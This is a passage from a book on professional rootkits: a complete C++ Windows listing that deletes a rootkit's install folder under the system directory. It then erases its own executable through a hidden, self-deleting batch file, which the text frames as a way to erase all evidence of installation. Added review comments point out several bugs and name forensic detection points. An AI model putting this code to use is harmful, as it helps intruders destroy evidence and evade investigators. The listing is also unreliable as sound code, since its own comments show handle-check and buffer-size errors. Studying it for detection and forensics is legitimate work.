Removing the Traces of an Installation


The Windows operating system does not provide a mechanism that allows a process to destroy its own image. This is because the image is protected while the process is running. Fortunately, this is not a limitation when using batch files, so an application that dynamically creates a batch file can erase all evidence of installation, provided the batch file is written to delete both its creator and itself.

The following example can be added to any custom installation application:

  // Uninstaller listing: recursively deletes a directory tree under the
  // Windows system directory, then deletes its own executable through a
  // generated batch file. Narrow-character Win32 API throughout, so this
  // assumes a non-UNICODE build.
  #include <windows.h>
  #include <string>
  #include <vector>
  #include <direct.h>
  #include <malloc.h>
  #include <shellapi.h>
  using namespace std;

  // One node of the tree being removed: a path, whether it is a directory,
  // and (for directories) its immediate children. Despite the member name,
  // subDirectories receives every enumerated entry, files included.
  typedef struct _DIRECTORY_STRUCT
  {
    string path;
    bool isdir;
    vector<_DIRECTORY_STRUCT> subDirectories;
    // isdir defaults to false and is corrected later by fillDirStruct().
    _DIRECTORY_STRUCT(const string& path, bool isdir = false):path(path), isdir(isdir){}
  } DIRECTORY_STRUCT;

  // Called by removeDirectory.
  // Determines whether root.path is a directory and, if so, lists its
  // immediate entries (files and sub-directories) into root.subDirectories.
  // Only one level is read here; recursion happens in removeDirectory.
  void fillDirStruct( DIRECTORY_STRUCT& root )
  {
    WIN32_FIND_DATA data;
    memset( &data, 0, sizeof(data) );
    // Look up root.path itself to read its attributes.
    HANDLE handle = FindFirstFile( root.path.c_str(), &data );
    // NOTE(review): FindFirstFile signals failure with INVALID_HANDLE_VALUE,
    // not NULL, so this test does not detect a missing path and FindClose
    // is called on the invalid handle; the attribute test below then
    // (most likely on still-zeroed data) takes the non-directory branch.
    if(handle != ( HANDLE)NULL )
      FindClose( handle );
    root.isdir = ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0);
    if(!root.isdir)
      return;
    // Enumerate the directory's contents with a wildcard.
    string path = root.path;
    path.append("\\*");
    handle = FindFirstFile( path.c_str(), &data );      // assumed to be "." - skipped
    FindNextFile( handle, &data );                            // assumed to be ".." - skipped
    // NOTE(review): neither the wildcard FindFirstFile result nor the
    // FindNextFile above is checked, so an enumeration failure is silent
    // and the "." / ".." ordering assumption is not verified.
    memset( &data, 0, sizeof(data) );
    while( FindNextFile( handle, &data ) == TRUE )
    {
      // Record each child by full path; its attributes are resolved when
      // the child is itself passed to fillDirStruct.
      path = root.path;
      path.append( "\\" ).append( data.cFileName );
      root.subDirectories.push_back( DIRECTORY_STRUCT( path ) );
      memset( &data, 0, sizeof(data) );
    };
    FindClose(handle);
  }

  // Called by removeDirectory.
  // Deletes a single file, first resetting its attributes to NORMAL so that
  // a read-only flag does not block DeleteFile. Both return values are
  // ignored, so a failed deletion goes unreported.
  void removeFile( const char * filename )
  {
    if( !filename )
      return ;
    SetFileAttributes( filename, FILE_ATTRIBUTE_NORMAL );
    DeleteFile( filename );
    return ;
  }

  // Recursive function to delete a directory and all subdirectories.
  // Depth-first: every child is removed before the directory itself, since
  // rmdir only succeeds on an empty directory. A path that is not a
  // directory is deleted as a file. No error is propagated to the caller.
  void removeDirectory( string& path )
  {
    if( path.empty() )
      return;
    DIRECTORY_STRUCT dirStruct( path.c_str() );
    fillDirStruct( dirStruct );
    if( dirStruct.isdir )
    {
      for( unsigned int j = 0; j < dirStruct.subDirectories.size(); j ++ )
      {
        // Copy the path: removeDirectory takes a non-const reference.
        string dpath = dirStruct.subDirectories[j].path;
        removeDirectory( dpath );
      }
      ::rmdir( path.c_str() );
    }
    else
    {
      removeFile( path.c_str() );
    }
    return;
  }

  // Name of the helper batch file written into the temp directory. From a
  // forensic standpoint this is the most durable artifact of the technique:
  // the file, its fixed name and its contents (the paths substituted below)
  // persist until the script's final "del" succeeds.
  static const char batchFileName[] = "uninstallRootkit.bat";

  // Deletes the running executable. Because the process image cannot be
  // deleted while it is mapped, a batch file is written to the temp
  // directory and launched with a hidden window; it loops on "del" until
  // the executable is gone, removes the executable's folder, then deletes
  // itself. Observable artifacts (detection points): a .bat created in the
  // temp directory, a ShellExecute of that file with SW_HIDE (dispatched to
  // the shell's .bat handler, normally cmd.exe), and a tight retry loop of
  // deletes against the executable's path.
  void SelfDestruct()
  {
    // Temporary batch file template. %s placeholders, in order: executable
    // path (del), executable path (if exist), executable's folder (rmdir),
    // batch file path (final del - the script removes itself).
    static char batchFile[] =
      ":Repeat\r\n"
      "del \"%s\"\r\n"
      "if exist \"%s\" goto Repeat\r\n"
      "rmdir \"%s\"\r\n"
      "del \"%s\"";
    char modulename[MAX_PATH];   // full path of this executable
    char temppath[MAX_PATH];     // temp directory + batchFileName
    char folder[MAX_PATH];       // directory containing this executable
    GetTempPath( MAX_PATH, temppath );
    // NOTE(review): unbounded strcat - a long temp path plus the file name
    // can exceed MAX_PATH; the GetTempPath result is not checked either.
    strcat( temppath, batchFileName );
    GetModuleFileName( NULL, modulename, MAX_PATH );
    // Strip the file name to obtain the containing folder.
    strcpy ( folder, modulename );
    char *pb = strrchr( folder, '\\' );
    if (pb != NULL)
      *pb = 0;
    HANDLE hf;
    hf = CreateFile( temppath, GENERIC_WRITE, 0, NULL,
      CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL );
    if (hf != INVALID_HANDLE_VALUE)
    {
      DWORD len;
      char *bat;
      // NOTE(review): the size budgets modulename twice and temppath once
      // but not folder, which is also substituted; the 20-byte slack can be
      // exceeded by a long folder path, and alloca's only failure mode is a
      // stack overflow.
      bat = (char*)alloca( strlen( batchFile ) +
        strlen( modulename ) * 2 + strlen( temppath ) + 20 );
      wsprintf( bat, batchFile, modulename, modulename, folder, temppath );
      WriteFile( hf, bat, strlen( bat ), &len, NULL );
      CloseHandle( hf );
      // Launch hidden and return; main then exits so the image is unmapped
      // and the script's "del" loop can succeed.
      ShellExecute( NULL, "open", temppath, NULL, NULL, SW_HIDE );
    }
  }

  // Removes %system32%\MyRootkit, then removes itself.
  // Entry point: the install directory is a hard-coded name under
  // GetSystemDirectory (writing there typically requires administrative
  // privilege), its tree is deleted, and the program finally schedules its
  // own deletion. Failing to resolve the system directory is the only
  // error reported (exit code 1).
  int main(int argc, char* argv[])
  {
    char systemDirectory[ MAX_PATH + 1 ];
    if( !GetSystemDirectory( systemDirectory, MAX_PATH + 1 ) )
      return 1;
    // Delete the install directory
    string directoryToDelete;
    directoryToDelete = systemDirectory;
    directoryToDelete += "\\MyRootkit";
    removeDirectory( directoryToDelete );
    // Delete this program
    SelfDestruct();
    return 0;
  }




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
